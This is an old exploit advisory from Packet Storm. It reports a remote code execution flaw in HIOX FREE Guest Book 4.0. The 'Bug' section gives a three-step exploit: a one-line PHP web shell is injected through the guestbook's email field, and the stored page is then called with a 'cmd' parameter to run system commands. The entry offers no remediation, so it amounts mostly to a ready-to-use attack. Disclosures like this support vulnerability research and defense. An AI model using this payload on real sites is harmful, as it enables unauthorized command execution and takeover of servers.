hgb-exec.txt

2007-04-11T00:00:00
ID PACKETSTORM:55821
Type packetstorm
Reporter Dj7xpl
Modified 2007-04-11T00:00:00

Description

                                        
                                            `+========================I=R=A=N============================+  
  
HGB Version 4.0   
  
=========================I=R=A=N=============================  
  
+========================I=R=A=N============================+  
  
Author :  
  
Dj7xpl / Dj7xpl[at]Yahoo[dot]com  
  
=========================I=R=A=N=============================  
  
+========================I=R=A=N============================+  
  
Type :  
  
Remote Code Execution Vulnerability  
  
=========================I=R=A=N=============================  
  
+========================I=R=A=N============================+  
  
Product / Vendor :  
  
HIOX FREE Guest Book  
  
http://www.hscripts.com/scripts/php/guestbook.php  
  
=========================I=R=A=N=============================  
  
+========================I=R=A=N============================+  
  
Bug :  
  
[1] Open Target By Browser  
  
[2] Insert Bad Code In Email E.g : <?php passthru($_GET[cmd]);?>@yahoo.com  
  
[3] See Bad C0de : http://[Targe]/[Path]/gb.php E.g : http://dj7xpl.ir/hgb/gb.php?cmd=dir  
  
=========================I=R=A=N=============================  
  
#Iran_e Sarbolande Man Sarboland Mimanad  
#Sp Tnx : str0ke  
  
  
`